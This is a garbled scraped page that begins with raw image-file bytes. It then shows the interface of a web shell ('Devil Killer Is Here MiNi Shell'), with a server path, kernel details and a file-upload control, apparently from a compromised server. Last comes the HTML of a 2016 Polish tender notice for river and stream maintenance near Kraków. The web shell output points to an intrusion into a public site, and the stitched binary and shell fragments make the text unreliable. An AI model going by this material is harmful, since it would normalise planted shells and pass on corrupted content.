JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160620/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160620/93813-N-2016.html

<p class="kh_header"><b>Kraków: Usługi zlokalizowane na terenie działalności Inspektoratu Rejonowego w Krakowie woj.małopolskie zgodnie z poszczególnymi częściami zamówienia.</b><br>
<b>Numer ogłoszenia: 93813 - 2016; data zamieszczenia: 20.06.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Małopolski Zarząd Melioracji i Urządzeń Wodnych Inspektorat Rejonowy w Krakowie , ul. Kraszewskiego 36, 30-110 Kraków, woj. małopolskie, tel. 12 628 09 80, faks 12 628 09 90.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.mzmiuw.krakow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Usługi zlokalizowane na terenie działalności Inspektoratu Rejonowego w Krakowie woj.małopolskie zgodnie z poszczególnymi częściami zamówienia..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Część zamówienia nr 25
Konserwacja nieuregulowanej rzeki Krzyworzeka w km 0+950-1+030 w miejscowości Skrzynka, gmina Dobczyce, powiat myślenicki
Zakres prac :
wykopy oraz przekopy w gruncie kat. III
wykonanie wyściółki z faszyny wiklinowej o grubości warstwy 25 cm
uzupełnienie ubytków w narzucie kamiennym w ilości 3,75m3/1mb
Część zamówienia nr 26
Konserwacja nieuregulowanego potoku Lipnik w km 4+400 - 4+600 (0,20km) w miejscowości Lipnik, gmina Wiśniowa, powiat myślenicki
Zakres prac :
wykopy oraz przekopy w gruncie kat. III - usunięcie zatoru żwirowego
wykopy oraz przekopy w gruncie kat. III - przygotowanie terenu pod oskałowanie
uzupełnienie ubytków w narzucie kamiennym w ilości 2,50m3/1mb

Część zamówienia nr 27
Konserwacja nieuregulowanego potoku Rudnickiego w km 3+300 - 3+340 (0,04km) 
w miejscowości Rudnik, gmina Sułkowice, powiat myślenicki

Zakres prac:

wykopy oraz przekopy w gruncie kat. IV - przygotowanie pod oskałowanie
wykonanie wyściółki z faszyny wiklinowej o grubości warstwy 25 cm
uzupełnienie narzutu kamiennego w ilości 3,74m3/1mb

Część zamówienia nr 28
Konserwacja nieuregulowanego potoku Harbutówka w km 1+800 - 1+900 (0,10km) 
w miejscowości Sułkowice, gm. Sułkowice, powiat myślenicki
Zakres prac:
ścinanie drzew piłą mechaniczną wraz z wywozem - zagospodarowanie 
we  własnym zakresie
wykopy oraz przekopy - wykop pod oskałowanie
uzupełnienie narzutu kamiennego z kamienia ciężkiego lub średniego w dnie
 na długości 40 mb w km 1+850-1+890 w ilości 2,50m3/1mb oraz w km 1+810-1+850
 w ilości 1m3/1mb

Część zamówienia nr 29
1.Konserwacja uregulowanej rzeki Szreniawy  w km 0+000 - 1+923, rozmiar 1,923 km;
m. Witów, gmina Koszyce, powiat proszowicki
Zakres prac:
Wykoszenie porostów, ręcznie ze skarp, porost gęsty, twardy z wygrabieniem
Ręczne ścinanie , krzaki i podszycia średniej gęstości wzdłuż rzeki z wywiezieniem                       i zagospodarowaniem we własnym zakresie 
Ręczne usunięcie zatorów w dnie rzeki (gałęzie, ziemia, śmieci) z wywiezieniem                             i zagospodarowaniem we własnym zakresie, odcinkowo na całej długości
Wykopy oraz przekopy wykonywane koparkami podsiębiernymi na odkład, koparka 0,60 m3, grunt kategorii III usunięcie zatorów w dnie rzeki, ścięcie nawisów ziemnych ze skarp rzeki, udrożnienie dna rzeki z rozplantowaniem wzdłuż skarp rzeki, szerokość dna od 8,0-6,0m, odcinkowo na całej długości
Zabudowa wyrwy w skarpie rzeki poprzez wykonanie faszynady 
Zabudowa wyrwy w skarpie rzeki poprzez wykonanie narzutu kamiennego luzem, z brzegu, wyładunek ręczny, narzut nadwodny z kamienia ciężkiego lub średniego

2.Konserwacja nieuregulowanej rzeki Szreniawy w km 13+700 - 15+400, rozmiar 1,70 km,          
m. Kuchary, gmina Nowe Brzesko, powiat proszowicki
Zakres prac:
Usunięcie powalonych drzew (wiatrołomu) z koryta rzeki w warunkach utrudnionych przy użyciu koparki o obwodzie 30 - 200 cm i długości ok.10 - 15m z pocięciem, wywiezieniem                        i zagospodarowaniem we własnym zakresie, według wskazań w terenie, punktowo na całym odcinku
Ręczne ścinanie, krzaki i podszycia średniej gęstości wzdłuż rzeki z wywiezieniem                         i zagospodarowaniem we własnym zakresie
Ręczne usunięcie zatorów w dnie rzeki (gałęzie, śmieci) z wywiezieniem i zagospodarowaniem we własnym zakresie, odcinkowo na całej długości - kalkulacja indywidualna
Usunięcie zatorów w dnie rzeki (korzenie, gałęzie, śmieci, konary drzew, pnie drzew, ziemia) przy użyciu sprzętu mechanicznego (koparka) z wywiezieniem i zagospodarowaniem we własnym zakresie, szerokość dna od 8,0-6,0m, głębokość koryta rzeki ok.4,0m odcinkowo na całej długości
Naprawa wyrw w skarpie rzeki - wbijanie palisady młotem pneumatycznym, kołki i słupki Fi 12-14 cm, długości 2,0 m, grunt kategorii III 
3.Konserwacja nieuregulowanej rzeki Szreniawy w km 30+000 - 35+000, rozmiar 5,00 km,          m. Proszowice, Gniazdowice, Jazdowiczki, gmina Proszowice, powiat proszowicki
Zakres prac:
Wykoszenie porostów, ręcznie ze skarp, porost gęsty, twardy z wygrabieniem
Oczyszczenie terenu z pozostałości po wykoszeniu i wycięciu drzew (trawa, gałęzie)                     z wywiezieniem i zagospodarowaniem we własnym zakresie
Usunięcie powalonych drzew (wiatrołomu) z koryta rzeki w warunkach utrudnionych przy użyciu koparki o obwodzie 50 - 300 cm i długości ok.10 - 15m z pocięciem, wywiezieniem                         i zagospodarowaniem we własnym zakresie, według wskazań w terenie, punktowo na całym odcinku 
Mechaniczne ścięcie drzewa oraz przycięcie konarów drzew w warunkach utrudnionych przy użyciu podnośnika montażowego, drzewa Fi 50-100 cm i długości ok.10 - 15m z pocięciem, wywiezieniem i zagospodarowaniem we własnym zakresie, według wskazań w terenie, punktowo na całym odcinku 
Ręczne ścinanie , krzaki i podszycia średniej gęstości wzdłuż rzeki z wywiezieniem                        i zagospodarowaniem we własnym zakresie
Ręczne usunięcie zatorów w dnie rzeki (gałęzie, śmieci) z wywiezieniem i zagospodarowaniem we własnym zakresie, odcinkowo na całej długości
Usunięcie zatorów w dnie rzeki (korzenie, gałęzie, śmieci, konary drzew, pnie drzew, ziemia) przy użyciu sprzętu mechanicznego (koparka) z wywiezieniem i zagospodarowaniem we własnym zakresie, szerokość dna od 8,0-6,0m, głębokość koryta rzeki ok.4,0m odcinkowo na całej długości
Naprawa wyrw w skarpie rzeki - wykonanie faszynady, wysokość ponad 1,0 m
Naprawa wyrw w skarpie rzeki - wbijanie palisady młotem pneumatycznym, słupki Fi 12-14 cm, długości 3,0 m, grunt kategorii III 
Naprawa opasek podwójnych z kiszek faszynowych, kiszki, Fi 20+20cm, między dwoma rzędami pali o średnicy 10-12cm i długości 2,0m, grunt kategorii III, wykonanie z brzegu
Zasypanie wyrw w skarpie rzeki - uzupełnienie narzutu kamiennego luzem, z brzegu, wyładunek ręczny, narzut nadwodny z kamienia średniego

Prace należy prowadzić z uwzględnieniem warunków podanych w decyzji RDOŚ (w załączeniu).Przed przystąpieniem  do prac należy skontrolować teren pod kątem występowania roślin oraz zwierząt objętych ochrona gatunkową. 
Kontroli winien dokonać specjalista przyrodnik z doświadczeniem w pracy w terenie, posiadający wiedzę i umiejętności rozpoznawania gatunków i siedlisk w szerokim zakresie, w tym szczególnie gatunków i siedlisk objętych ochroną i rzadkich.
W związku z powyższym przed przystąpieniem do prac; należy sporządzić notatkę z rozpoznania terenu przez przyrodnika i przekazać ją do Inspektoratu Rejonowego w Krakowie..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 71.34.00.00-3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 5.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa szczegółowych wymagań w tym zakresie i sposobu oceny</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten będzie spełniony przez Wykonawcę jeżeli: a.)1.wykaże, że w okresie ostatnich trzech lat przed upływem terminu składania ofert , a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie , że wykonali co najmniej 2 prace w zakresie konserwacji, regulacji, usuwaniu szkód powodziowych w korycie rzek i potoków o wartości  co najmniej 80 000 zł. każda, odpowiadające swoim rodzajem pracom stanowiącym przedmiot /dotyczy części zamówienia Nr 25 / z podaniem ich wartości, przedmiotu, daty wykonania i podmiotów na rzecz których usługi zostały wykonane, oraz załączeniem dowodów ,czy zostały wykonane lub są wykonywane/świadczenia okresowe lub ciągłe/ należycie. 
a.)2.wykaże, że w okresie ostatnich trzech lat przed upływem terminu składania ofert , a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie , że wykonali co najmniej 2 prace w zakresie konserwacji, regulacji, usuwaniu szkód powodziowych w korycie rzek i potoków o wartości  co najmniej 40 000 zł. każda, odpowiadające swoim rodzajem pracom stanowiącym przedmiot /dotyczy części zamówienia Nr 26,28 / z podaniem ich wartości, przedmiotu, daty wykonania i podmiotów na rzecz których usługi zostały wykonane, oraz załączeniem dowodów ,czy zostały wykonane lub są wykonywane/świadczenia okresowe lub ciągłe/ należycie. 
a.)3.wykaże, że w okresie ostatnich trzech lat przed upływem terminu składania ofert , a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie , że wykonali co najmniej 2 prace w zakresie konserwacji, regulacji, usuwaniu szkód powodziowych w korycie rzek i potoków o wartości  co najmniej 35 000 zł. każda, odpowiadające swoim rodzajem pracom stanowiącym przedmiot /dotyczy części zamówienia Nr 27 / z podaniem ich wartości, przedmiotu, daty wykonania i podmiotów na rzecz których usługi zostały wykonane, oraz załączeniem dowodów ,czy zostały wykonane lub są wykonywane/świadczenia okresowe lub ciągłe/ należycie. 
a.)4.wykaże, że w okresie ostatnich trzech lat przed upływem terminu składania ofert , a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie , że wykonali co najmniej 2 prace w zakresie konserwacji, regulacji, usuwaniu szkód powodziowych w korycie rzek i potoków o wartości  co najmniej 75 000 zł. każda, odpowiadające swoim rodzajem pracom stanowiącym przedmiot /dotyczy części zamówienia Nr 29 / z podaniem ich wartości, przedmiotu, daty wykonania i podmiotów na rzecz których usługi zostały wykonane, oraz załączeniem dowodów ,czy zostały wykonane lub są wykonywane/świadczenia okresowe lub ciągłe/ należycie.Ocena spełnienia w.w.warunku na podstawie informacji zawartych w przedłożonych dokumentach.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten będzie spełniony przez Wykonawcę jeżeli wykażą ,że dysponują sprzętem i urządzeniami niezbędnymi do wykonania zamówienia a w szczególności; co najmniej 1 koparkę,1 samochód samowyładowczy lub1 ciągnik . Ocena spełnienia w.w.warunku na podstawie informacji zawartych w przedłożonych dokumentach.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony jeżeli wykonawca wykaże ,że 1. dysponują osobami posiadającymi kwalifikacje zawodowe, doświadczenie , wykształcenie i uprawnienia niezbędne do realizacji zamówienia w rozumieniu ustawy Prawo budowlane z dnia 7 lipca 1994 (tj. Dz. U. z 2013 r., poz. 1409 z późn. zm.) lub odpowiadające im równoważne uprawnienia wydane na podstawie wcześniej obowiązujących przepisów lub odpowiednie kwalifikacje zawodowe uznane na zasadach określonych w przepisach odrębnych oraz ustawy z dnia 15 grudnia 2000 r. o samorządach zawodowych architektów, inżynierów budownictwa oraz urbanistów (t.j. Dz.U. z 2013 r. poz.932) do kierowania robotami budowlanymi na stanowisku: kierownika budowy, który musi posiadać uprawnienia budowlane do kierowania robotami budowlanymi w specjalności konstrukcyjno-budowlanej w zakresie budowli melioracji wodnych lub budowli hydrotechnicznych. W przypadku wykonawców zagranicznych, zamawiający dopuścił równoważne kwalifikacje, zdobyte w innych państwach, na zasadach określonych w art. 12a ustawy z dnia 7 lipca 1994r. Prawo budowlane, z uwzględnieniem postanowień ustawy z dnia 18 marca 2008r. o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (Dz. U. 2008, nr 63, poz. 394 ze zm.) 2.dysponują osobą specjalista przyrodnik z doświadczeniem pracy w terenie, posiadający wiedzę i umiejętności rozpoznawania gatunków i siedlisk w szerokim zakresie, w tym szczególnie gatunków i siedlisk objętych ochroną i rzadkich .Ocena spełnienia w.w.warunku na podstawie informacji zawartych w przedłożonych dokumentach</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa szczegółowych wymagań w tym zakresie i sposobu oceny</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.Wypełniony Formularz Oferty 2. Dokument ustanawiający Pełnomocnika do reprezentowania Wykonawców wspólnie ubiegających się o udzielenie niniejszego zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie niniejszego zamówienia publicznego - w przypadku, gdy Wykonawcy składają wspólną ofertę, 3. Stosowne pełnomocnictwo(a) potwierdzające, że dana osoba nie wymieniona w dokumencie rejestracyjnym prowadzonej działalności jest upoważniona do reprezentowania wykonawcy w postępowaniu. 4. Pisemne zobowiązanie innych podmiotów do oddania Wykonawcy do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia w sytuacji polegania przez Wykonawcę na wiedzy i doświadczeniu, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów 4.1. oświadczenie innego podmiotu o braku podstaw do wykluczenia z postępowania z powodu nie spełniania warunków, o których mowa w art. 24 ust. 1 Ustawy, zgodnie z drukiem stanowiącym załącznik do SIWZ; 4.2.dla weryfikacji osoby (reprezentacji) innego podmiotu podpisującej zobowiązanie aktualny odpis z właściwego rejestru lub centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.5.kosztorys ofertowy</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 95</li>
<li>2 - warunki płatności - 5</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Wszelkie zmiany i uzupełnienia umowy mogą być dokonywane wyłącznie w formie pisemnego aneksu, podpisanego przez obie strony. 2. Z zastrzeżeniem formy przewidzianej w ust.1, Strony dopuszczają możliwość zmiany treści umowy w następującym zakresie: a) zmiany w KRS, wpisie do ewidencji działalności gospodarczej lub (CEIDG) w trakcie realizacji zamówienia. b) zmiany kont bankowych, c) wystąpienie oczywistych omyłek pisarskich i rachunkowych w treści umowy. d) w przypadku ustawowej zmiany stawki podatku od towarów i usług na przedmiot umowy, cena brutto określona w umowie ulegnie odpowiedniej zmianie, przy czym cena netto pozostanie niezmieniona e) zmiany terminu wykonania umowy z zastrzeżeniem ust. 3 3. Zmiana terminów wykonania przedmiotu zamówienia będzie możliwa wyłącznie w przypadku zdarzeń losowych tj. podtopienia terenu robót, spowodowanego powodzią lub intensywnymi opadami deszczu tylko jeśli uniemożliwia to prowadzenie robót, bądź też wystąpienia innych okoliczności niezależnych od wykonawcy i udokumentowanych w formie pisemnej a mających wpływ na termin realizacji przedmiotu umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.mzmiuw.krakow.pl<br>
